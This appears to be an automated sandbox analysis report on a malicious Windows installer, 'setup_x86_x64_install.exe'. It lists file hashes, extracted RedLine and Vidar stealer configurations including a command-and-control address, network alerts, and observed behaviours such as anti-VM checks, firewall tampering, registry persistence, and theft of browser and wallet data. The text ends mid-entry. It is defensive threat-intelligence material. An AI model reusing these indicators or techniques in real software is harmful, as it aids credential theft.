Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
05-10-2021 16:27
211005-tx24csaah9 1004-10-2021 16:37
211004-t43cpsgfe7 1004-10-2021 07:39
211004-jhgtrsfhf8 1003-10-2021 18:09
211003-wryvvsffgk 1002-10-2021 23:31
211002-3hwsgaehhl 1002-10-2021 06:10
211002-gxfh5sdgg7 1001-10-2021 13:44
211001-q16deabhek 10Analysis
-
max time kernel
529s -
max time network
1800s -
platform
windows11_x64 -
resource
win11 -
submitted
03-10-2021 18:09
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
6.4MB
-
MD5
c6e46aa3d6424b03e0a4ccb193d3eade
-
SHA1
c8b49055743fa7b4d6a982aea26efb627bb1f2e1
-
SHA256
5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156
-
SHA512
06e0c7d8012d4dbf1e6ccb7049c16d3041eb792261cc9910115c8663a45272c90cbce0ccd51875b8cd465b8f5a5c9f69164cc665b60787884ac42aec3aa7d32e
Malware Config
Extracted
redline
ANI
45.142.215.47:27643
Extracted
vidar
41.1
921
https://mas.to/@bardak1ho
-
profile_id
921
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" powershell.exe -
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5072 4840 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8776 4840 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8600 4840 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10136 4840 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/5768-292-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5768-293-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10720d229511df563.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10720d229511df563.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 35 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5732 created 5324 5732 WerFault.exe rundll32.exe PID 5996 created 4628 5996 WerFault.exe Fri105268dda3.exe PID 2916 created 1172 2916 WerFault.exe Fri1015b9a4e0b.exe PID 4644 created 5204 4644 WerFault.exe Fri10acd1e0a9e6.exe PID 3872 created 4560 3872 WerFault.exe Firstoffer.exe PID 5836 created 4836 5836 WerFault.exe Z0vWFXUapMHmh_phsDBKsg6d.exe PID 3084 created 4992 3084 WerFault.exe hfNfszaiVyu9terbhxabjMWT.exe PID 1660 created 6096 1660 WerFault.exe FGP00Y3mTuq2surDBGCBZ2PR.exe PID 6248 created 5020 6248 WerFault.exe UjMxALCgOD36c61XgfZBL0C9.exe PID 6668 created 2480 6668 WerFault.exe cmd.exe PID 6352 created 5972 6352 WerFault.exe Eow9sch3bUzf_WXXvx7RU2Yr.exe PID 5520 created 5436 5520 WerFault.exe t6fnIyPK4SEmcNK1OEvBGBKz.exe PID 7924 created 7632 7924 WerFault.exe eInAfAAnadxOn3g6O89Cb5FT.exe PID 3676 created 5700 3676 WerFault.exe ShadowVPNInstaller_t3.exe PID 8636 created 5700 8636 powershell.exe ShadowVPNInstaller_t3.exe PID 5828 created 4560 5828 WerFault.exe Firstoffer.exe PID 912 created 5700 912 ShadowVPNInstaller_t3.exe PID 2664 created 7676 2664 WerFault.exe 7DrghgbkgI2jLUHFNgq_bxXK.exe PID 8572 created 7332 8572 WerFault.exe setup.exe PID 8640 created 3848 8640 WerFault.exe SgfJUJN11IroPHvivngzyLg1.exe PID 8360 created 2192 8360 WerFault.exe rundll32.exe PID 2844 created 5700 2844 WerFault.exe ShadowVPNInstaller_t3.exe PID 4752 created 5700 4752 WerFault.exe ShadowVPNInstaller_t3.exe PID 7884 created 5700 7884 WerFault.exe ShadowVPNInstaller_t3.exe PID 6108 created 8692 6108 WerFault.exe 8CD2.exe PID 8580 created 7868 8580 WerFault.exe rundll32.exe PID 9516 created 8276 9516 WerFault.exe GcleanerEU.exe PID 10228 created 10160 10228 WerFault.exe rundll32.exe PID 10708 created 14468 10708 WerFault.exe 5C99.exe PID 10816 created 14748 10816 WerFault.exe GcleanerEU.exe PID 11220 created 13912 11220 WerFault.exe 79F6.exe PID 11756 created 8168 11756 WerFault.exe gcleaner.exe PID 11804 created 1988 11804 WerFault.exe gcleaner.exe PID 12444 created 4796 12444 WerFault.exe C52A.exe PID 15356 created 4416 15356 WerFault.exe 123441egwegweg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 12112 created 10600 12112 svchost.exe UpSys.exe PID 12112 created 12252 12112 svchost.exe UpSys.exe -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
-
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral4/memory/888-488-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\libcurl.dll aspack_v212_v242 -
Blocklisted process makes network request 51 IoCs
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.exeMsiExec.exeflow pid process 35 5768 cmd.exe 39 5704 cmd.exe 41 5768 cmd.exe 78 5704 cmd.exe 106 888 cmd.exe 109 2500 cmd.exe 110 888 cmd.exe 118 888 cmd.exe 131 2500 cmd.exe 241 3996 cmd.exe 323 3748 cmd.exe 487 12120 MsiExec.exe 493 12120 MsiExec.exe 494 12120 MsiExec.exe 495 12120 MsiExec.exe 497 12120 MsiExec.exe 499 12120 MsiExec.exe 500 12120 MsiExec.exe 501 12120 MsiExec.exe 503 12120 MsiExec.exe 504 12120 MsiExec.exe 508 12120 MsiExec.exe 510 12120 MsiExec.exe 511 12120 MsiExec.exe 512 12120 MsiExec.exe 513 12120 MsiExec.exe 514 12120 MsiExec.exe 516 12120 MsiExec.exe 517 12120 MsiExec.exe 519 12120 MsiExec.exe 520 12120 MsiExec.exe 522 12120 MsiExec.exe 523 12120 MsiExec.exe 524 12120 MsiExec.exe 525 12120 MsiExec.exe 526 12120 MsiExec.exe 527 12120 MsiExec.exe 528 12120 MsiExec.exe 530 12120 MsiExec.exe 531 12120 MsiExec.exe 532 12120 MsiExec.exe 533 12120 MsiExec.exe 535 12120 MsiExec.exe 536 12120 MsiExec.exe 537 12120 MsiExec.exe 538 12120 MsiExec.exe 539 12120 MsiExec.exe 541 12120 MsiExec.exe 543 12120 MsiExec.exe 544 12120 MsiExec.exe 545 12120 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
ShadowVPNInstaller_t3.exeConhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts ShadowVPNInstaller_t3.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Conhost.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeFri10584c049c7f.exeFri10b0a06a73706.exeFri1015b9a4e0b.exeFri106e757f6d75.exeFri1008c7d6874.exeFri103a7805577.exeFri10720d229511df563.exeFri1034cd265b5e0adcd.exeFri1018ef4aa251c026c.exeFri105268dda3.exeFri10d184202996a0d7f.exeFri10fcc13ae0125c8.exeFri10acd1e0a9e6.exeFri10fcc13ae0125c8.tmpFri106e757f6d75.exe8866579.scrSkVPVS3t6Y8W.EXe2402267.scr2768772.scrFri106e757f6d75.execmd.execonhost.exeWinHoster.exeuHQTVMa71BpO6ahOUBeXGh7S.exeShadowVPNInstaller_t3.exeZ0vWFXUapMHmh_phsDBKsg6d.exeuFV1qYteW8OniKJlNEeZ9vlH.execmd.execmd.exeN0VjIjlb_wrY4X36qFb0KkVc.exehfNfszaiVyu9terbhxabjMWT.exelh2ZWaoIYwT9AEZddJ89Fx_y.exevRimKORg6sXDoijekzeZQRUR.exeCV3wZcym4qGbTCJGIrRdV3Uq.exellJVCyoEgJxuaB4XO_SNJcmN.exeDatabase.exeEow9sch3bUzf_WXXvx7RU2Yr.exeJava.exeLauncher.exeRuntimeBroker.exehfNfszaiVyu9terbhxabjMWT.exevRimKORg6sXDoijekzeZQRUR.execmd.exeInstall.exeUjmEzzcdEw15G25sQGzbQOMX.exe4256270.scr9KzuhE7Lw8ZuxqLTgVWfZqc5.exeMi7ACiBw_NKvp3OaVcQbL0ci.exeGT4rJDknjBn1Q15NPVcLOGnM.exeUjMxALCgOD36c61XgfZBL0C9.exe3SIZP_yBJOASbSHbQAH4kgIc.exe2Uz1J5c5sQRXrL2lNS7Xs_QF.exe2118840.scrFGP00Y3mTuq2surDBGCBZ2PR.exe75lpt8hlC1NGZyE5J12J4MX_.exeInstall.exet6fnIyPK4SEmcNK1OEvBGBKz.exeWXhP7Lj7noVP0ru01p2gZwdG.exeW5TmQT5ajJ9vWwg5m1wuKb6e.execm3.exeinst002.exewmiprvse.exepid process 4776 setup_installer.exe 4820 setup_install.exe 3204 Fri10584c049c7f.exe 1200 Fri10b0a06a73706.exe 1172 Fri1015b9a4e0b.exe 3872 Fri106e757f6d75.exe 4768 Fri1008c7d6874.exe 5004 Fri103a7805577.exe 4560 Fri10720d229511df563.exe 3480 Fri1034cd265b5e0adcd.exe 4572 Fri1018ef4aa251c026c.exe 4628 Fri105268dda3.exe 4356 Fri10d184202996a0d7f.exe 4984 Fri10fcc13ae0125c8.exe 5204 Fri10acd1e0a9e6.exe 5224 Fri10fcc13ae0125c8.tmp 5604 Fri106e757f6d75.exe 5776 8866579.scr 5792 SkVPVS3t6Y8W.EXe 5872 2402267.scr 6100 2768772.scr 5768 Fri106e757f6d75.exe 5704 cmd.exe 5744 conhost.exe 5240 WinHoster.exe 6012 uHQTVMa71BpO6ahOUBeXGh7S.exe 5700 ShadowVPNInstaller_t3.exe 4836 Z0vWFXUapMHmh_phsDBKsg6d.exe 2348 uFV1qYteW8OniKJlNEeZ9vlH.exe 2480 cmd.exe 2500 cmd.exe 5648 N0VjIjlb_wrY4X36qFb0KkVc.exe 4992 hfNfszaiVyu9terbhxabjMWT.exe 4636 lh2ZWaoIYwT9AEZddJ89Fx_y.exe 4952 vRimKORg6sXDoijekzeZQRUR.exe 4956 CV3wZcym4qGbTCJGIrRdV3Uq.exe 4700 llJVCyoEgJxuaB4XO_SNJcmN.exe 5884 Database.exe 5972 Eow9sch3bUzf_WXXvx7RU2Yr.exe 2904 Java.exe 5612 Launcher.exe 5440 RuntimeBroker.exe 4948 hfNfszaiVyu9terbhxabjMWT.exe 1200 vRimKORg6sXDoijekzeZQRUR.exe 888 cmd.exe 1428 Install.exe 3976 UjmEzzcdEw15G25sQGzbQOMX.exe 4088 4256270.scr 4328 9KzuhE7Lw8ZuxqLTgVWfZqc5.exe 3708 Mi7ACiBw_NKvp3OaVcQbL0ci.exe 4188 GT4rJDknjBn1Q15NPVcLOGnM.exe 5020 UjMxALCgOD36c61XgfZBL0C9.exe 4412 3SIZP_yBJOASbSHbQAH4kgIc.exe 3180 2Uz1J5c5sQRXrL2lNS7Xs_QF.exe 5992 2118840.scr 6096 FGP00Y3mTuq2surDBGCBZ2PR.exe 3600 75lpt8hlC1NGZyE5J12J4MX_.exe 5580 Install.exe 5436 t6fnIyPK4SEmcNK1OEvBGBKz.exe 5368 WXhP7Lj7noVP0ru01p2gZwdG.exe 2796 W5TmQT5ajJ9vWwg5m1wuKb6e.exe 2020 cm3.exe 5588 inst002.exe 3992 wmiprvse.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 52 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
cmd.exeMi7ACiBw_NKvp3OaVcQbL0ci.exe2897423.scr1793412.scrfilename.exeB1DF.exeF561.exeFri10d184202996a0d7f.exeA4A1.exeN0VjIjlb_wrY4X36qFb0KkVc.exe75lpt8hlC1NGZyE5J12J4MX_.exeW5TmQT5ajJ9vWwg5m1wuKb6e.exe39DE.exeDatabase.exe3SIZP_yBJOASbSHbQAH4kgIc.exe7105377.scr3353340.scr2768772.scrGT4rJDknjBn1Q15NPVcLOGnM.exe1903531.scr5478727.scrDatabase.execmd.exeInstall.exeInstall.exeCV3wZcym4qGbTCJGIrRdV3Uq.exe2Uz1J5c5sQRXrL2lNS7Xs_QF.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mi7ACiBw_NKvp3OaVcQbL0ci.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2897423.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1793412.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion filename.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion B1DF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F561.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion A4A1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N0VjIjlb_wrY4X36qFb0KkVc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 75lpt8hlC1NGZyE5J12J4MX_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion W5TmQT5ajJ9vWwg5m1wuKb6e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 39DE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 75lpt8hlC1NGZyE5J12J4MX_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3SIZP_yBJOASbSHbQAH4kgIc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7105377.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion filename.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3353340.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3353340.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 39DE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2768772.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N0VjIjlb_wrY4X36qFb0KkVc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GT4rJDknjBn1Q15NPVcLOGnM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1793412.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1903531.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2768772.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5478727.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2897423.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7105377.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1903531.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion B1DF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion A4A1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3SIZP_yBJOASbSHbQAH4kgIc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mi7ACiBw_NKvp3OaVcQbL0ci.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion W5TmQT5ajJ9vWwg5m1wuKb6e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5478727.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CV3wZcym4qGbTCJGIrRdV3Uq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GT4rJDknjBn1Q15NPVcLOGnM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2Uz1J5c5sQRXrL2lNS7Xs_QF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2Uz1J5c5sQRXrL2lNS7Xs_QF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F561.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CV3wZcym4qGbTCJGIrRdV3Uq.exe -
Drops startup file 3 IoCs
Processes:
RuntimeBroker.exefilename.exeNetFrame.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk RuntimeBroker.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk filename.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk NetFrame.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeFri10fcc13ae0125c8.tmprundll32.exerundll32.exevRimKORg6sXDoijekzeZQRUR.exerundll32.exeRegSvcs.exeh9qXJLEbV8pRQS5MPg58kADw.tmpsetup_2.tmpsetup_2.tmpLzmwAqmV.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exeinstaller.exerundll32.exerundll32.exeMsiExec.exerundll32.exeMsiExec.exepid process 4820 setup_install.exe 4820 setup_install.exe 4820 setup_install.exe 4820 setup_install.exe 4820 setup_install.exe 5224 Fri10fcc13ae0125c8.tmp 5324 rundll32.exe 852 rundll32.exe 852 rundll32.exe 4952 vRimKORg6sXDoijekzeZQRUR.exe 5532 rundll32.exe 5532 rundll32.exe 3772 RegSvcs.exe 3772 RegSvcs.exe 3772 RegSvcs.exe 7328 h9qXJLEbV8pRQS5MPg58kADw.tmp 6628 setup_2.tmp 9172 setup_2.tmp 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 9144 LzmwAqmV.exe 2192 rundll32.exe 3148 rundll32.exe 4264 rundll32.exe 9168 rundll32.exe 13984 rundll32.exe 14312 rundll32.exe 14532 installer.exe 14532 installer.exe 15208 rundll32.exe 7868 rundll32.exe 14532 installer.exe 9348 MsiExec.exe 9348 MsiExec.exe 10160 rundll32.exe 12120 MsiExec.exe 12120 MsiExec.exe 12120 MsiExec.exe 12120 MsiExec.exe 12120 MsiExec.exe 12120 MsiExec.exe 12120 MsiExec.exe 12120 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10d184202996a0d7f.exe themida C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10d184202996a0d7f.exe themida behavioral4/memory/4356-250-0x00000000000B0000-0x00000000000B1000-memory.dmp themida C:\Users\Admin\AppData\Roaming\2768772.scr themida C:\Users\Admin\AppData\Roaming\1294868.scr themida behavioral4/memory/6100-328-0x0000000000090000-0x0000000000091000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
2402267.scrmsedge.exeShadowVPNInstaller_t3.exeConhost.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 2402267.scr Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Qaelozhacele.exe\"" ShadowVPNInstaller_t3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Nuwemybykae.exe\"" Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Fri10d184202996a0d7f.exe3SIZP_yBJOASbSHbQAH4kgIc.exeW5TmQT5ajJ9vWwg5m1wuKb6e.exeF561.exe39DE.exe2768772.scrcmd.exe75lpt8hlC1NGZyE5J12J4MX_.exe2897423.scr3353340.scrB1DF.exeA4A1.exefilename.exeCV3wZcym4qGbTCJGIrRdV3Uq.execmd.exeMi7ACiBw_NKvp3OaVcQbL0ci.exe2Uz1J5c5sQRXrL2lNS7Xs_QF.exe5478727.scr7105377.scr1903531.scrDatabase.exeDatabase.exeN0VjIjlb_wrY4X36qFb0KkVc.exeGT4rJDknjBn1Q15NPVcLOGnM.exe1793412.scrXvFe4GzJul_YZ2OFsGeMoF0i.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fri10d184202996a0d7f.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3SIZP_yBJOASbSHbQAH4kgIc.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA W5TmQT5ajJ9vWwg5m1wuKb6e.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F561.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 39DE.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2768772.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 75lpt8hlC1NGZyE5J12J4MX_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2897423.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3353340.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B1DF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA A4A1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA filename.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CV3wZcym4qGbTCJGIrRdV3Uq.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Mi7ACiBw_NKvp3OaVcQbL0ci.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2Uz1J5c5sQRXrL2lNS7Xs_QF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5478727.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7105377.scr Key value queried 